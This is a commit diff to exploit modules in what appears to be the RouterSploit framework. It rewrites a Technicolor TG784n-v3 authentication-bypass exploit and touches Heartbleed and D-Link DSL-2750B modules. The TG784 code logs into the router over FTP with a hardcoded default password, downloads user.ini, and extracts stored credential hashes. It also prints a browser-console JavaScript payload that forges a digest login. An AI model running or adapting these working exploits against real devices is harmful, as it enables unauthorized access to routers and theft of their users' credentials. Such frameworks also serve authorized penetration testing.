Fixing tg784_authbypass, dlink-dsl and heartbleed (#411)

routersploit/core/ftp/ftp_client.py

 import socket
 import ftplib
+import io
 
 from routersploit.core.exploit.exploit import Exploit
 from routersploit.core.exploit.exploit import Protocol
@@ -62,3 +63,11 @@ class FTPClient(Exploit):
             return True
 
         return False
+
+    def ftp_get_content(self, ftp_client, remote_file):
+        if ftp_client:
+            fp_content = io.BytesIO()
+            ftp_client.retrbinary("RETR {}".format(remote_file), fp_content.write)
+            return fp_content.getvalue()
+
+        return None

routersploit/core/tcp/tcp_client.py

@@ -64,6 +64,8 @@ class TCPClient(Exploit):
                 return response
             except socket.timeout:
                 print_error("Socket did timeout")
+            except socket.error:
+                print_error("Socket error")
 
         return None
 

routersploit/modules/exploits/generic/heartbleed.py

@@ -39,6 +39,7 @@ class Exploit(TCPClient):
             "https://gist.github.com/takeshixx/10107280",
             "https://github.com/FiloSottile/Heartbleed",
             "http://filippo.io/Heartbleed/",
+            "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb",
         ),
         "devices": (
             "Multi",
@@ -164,7 +165,9 @@ class Exploit(TCPClient):
         return False
 
     def bleed(self):
-        self.establish_connect()
+        if not self.establish_connect():
+            print_error("Exploit failed - could not establish connection")
+            return False
 
         print_status("Sending Heartbeat...")
         heartbeat_req = self.heartbeat_request(self.heartbeat_length)

routersploit/modules/exploits/routers/dlink/dsl_2750b_rce.py

@@ -35,6 +35,7 @@ class Exploit(HTTPClient):
             path=path
         )
 
+    @mute
     def check(self):
         response = self.http_request(
             method="GET",

routersploit/modules/exploits/routers/technicolor/tg784_authbypass.py

 import re
-from StringIO import StringIO
+from io import StringIO
 from routersploit.core.exploit import *
 from routersploit.core.ftp.ftp_client import FTPClient
-from routersploit.core.telnet.telnet_client import TelnetClient
 
 
-class Exploit(FTPClient, TelnetClient):
+class Exploit(FTPClient):
     __info__ = {
         "name": "Technicolor TG784n-v3 Auth Bypass",
         "description": "Module exploits Technicolor TG784n-v3 authentication bypass vulnerability.",
-        "authors": [
+        "authors": (
             "Jose Moreira",  # vulnerability discovery & analysis
             "0BuRner",  # routersploit module
             "Marcin Bury <marcin[at]threat9.com>",  # little fixes
-        ],
-        "references": [
+        ),
+        "references": (
             "http://modem-help.forum-phpbb.co.uk/t1-fixing-username-password-problems",
             "http://modem-help.forum-phpbb.co.uk/t2-howto-root-tg784",
-        ],
-        "devices": [
+        ),
+        "devices": (
             "Technicolor TG784n-v3",
             "Unknown number of Technicolor and Thompson routers",
-        ]
+        )
     }
 
     target = OptIP("", "Target IPv4 or IPv6 address")
-    port = OptPort(80, "Target HTTP port")
+    port = OptPort(21, "Target FTP port")
 
-    ftp_port = exploits.Option(21, 'Target FTP port')
-    telnet_port = exploits.Option(23, 'Target Telnet port')
-
-    remote_user = exploits.Option('upgrade', 'Default FTP username')
-    remote_pass = exploits.Option('Th0ms0n!', 'Default FTP password for "upgrade" user')
-
-    config_path = exploits.Option('user.ini', 'Path to config file')
+    username = OptString("upgrade", "Default FTP username")
+    password = OptString("Th0ms0n!", "Default FTP password for \"upgrade\" user")
 
     def run(self):
-        response = self.telnet_login()
-        if 'Login not allowed' in response and self.is_port_opened(self.ftp_port):
-            print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
-            print_status("FTP and HTTP service active")
-            creds = self.ftp_get_config()
-
-            if creds:
-                print_status("Use javascript console (through developer tools) to bypass authentication:")
-                payload = ('var user = "{}"\n'
-                           'var hash2 = "{}";\n'
-                           'var HA2 = MD5("GET" + ":" + uri);\n'
-                           'document.getElementById("user").value = user;\n'
-                           'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
-                           'document.authform.submit();\n')
+        creds = self.get_credentials()
+        if creds:
+            print_success("Found encrypted credentials:")
+            print_table(("Name", "Password", "Role", "Hash2", "Crypt"), *creds)
+
+            print_status("Use javascript console (through developer tools) to bypass authentication:")
+            payload = ('var user = "{}"\n'
+                       'var hash2 = "{}";\n'
+                       'var HA2 = MD5("GET" + ":" + uri);\n'
+                       'document.getElementById("user").value = user;\n'
+                       'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
+                       'document.authform.submit();\n')
+
+            for user in creds:
+                print_success("User: {} Role: {}".format(user[0], user[2]))
+                print_info(payload.format(user[0], user[3]))
 
-                for user in creds:
-                    print_success("User: {} Role: {}".format(user[0], user[2]))
-                    print_info(payload.format(user[0], user[3]))
-
-        elif '}=>' in response:
-            print_success("Successful authentication through Telnet service")
-            tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
-            tn.read_until(': ')
-            tn.write(self.remote_user + '\r\n')
-            tn.read_until(': ')
-            tn.write(self.remote_pass + '\r\n')
-            tn.interact()
         else:
             print_error("Exploit failed - target seems to be not vulnerable")
 
     @mute
     def check(self):
-        response = self.telnet_login()
-        if 'Login not allowed' in response and self.is_port_opened(self.ftp_port) and self.ftp_get_config():
-            return True
-
-        elif '}=>' in response:
+        if self.get_credentials():
             return True
 
         return False
 
-    def telnet_login(self):
-        print_status("Telnet: {}:{} Authenticating with Username: {} Password: {}".format(self.target,
-                                                                                          self.telnet_port,
-                                                                                          self.remote_user,
-                                                                                          self.remote_pass))
-        try:
-            tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
-            tn.read_until(': ')
-            tn.write(self.remote_user + '\r\n')
-            tn.read_until(': ')
-            tn.write(self.remote_pass + '\r\n')
-            response = tn.read_until("Login not allowed", 10)
-            tn.close()
-        except:
-            return ""
 
-        return response
+    def get_credentials(self):
+        print_status("Trying FTP authentication with Username: {} and Password: {}".format(self.username,
+                                                                                           self.password))
 
-    def is_port_opened(self, port):
-        try:
-            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-            s.settimeout(3)
-            s.connect((self.target, port))
-            return True
-        except:
-            return False
-        finally:
-            s.close()
-
-    def ftp_get_config(self):
-        print_status("FTP {}:{} Trying FTP authentication with Username: {} and Password: {}".format(self.target,
-                                                                                                     self.ftp_port,
-                                                                                                     self.remote_user,
-                                                                                                     self.remote_pass))
-        ftp = ftplib.FTP()
-
-        try:
-            ftp.connect(self.target, port=int(self.ftp_port), timeout=10)
-            ftp.login(self.remote_user, self.remote_pass)
-
-            print_success("FTP {}:{} Authentication successful".format(self.target, self.ftp_port))
-            if self.config_path in ftp.nlst():
-                print_status("FTP {}:{} Downloading: {}".format(self.target, self.ftp_port, self.config_path))
-                r = StringIO()
-                ftp.retrbinary('RETR {}'.format(self.config_path), r.write)
-                ftp.close()
-                data = r.getvalue()
-
-                creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data)
-                if creds:
-                    print_success("Found encrypted credentials:")
-                    print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds)
-                    return creds
-                else:
-                    print_error("Exploit failed - could not find any credentials")
-        except ftplib.all_errors:
-            print_error("Exploit failed - FTP error")
+        ftp_client = self.ftp_login(self.username, self.password)
+        if ftp_client:
+            print_success("Authentication successful")
+            content = self.ftp_get_content(ftp_client, "user.ini")
+            creds = re.findall(r"add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n", str(content, "utf-8"))
+            return creds
+        else:
+            print_error("Exploit failed - authentication failed")
 
         return None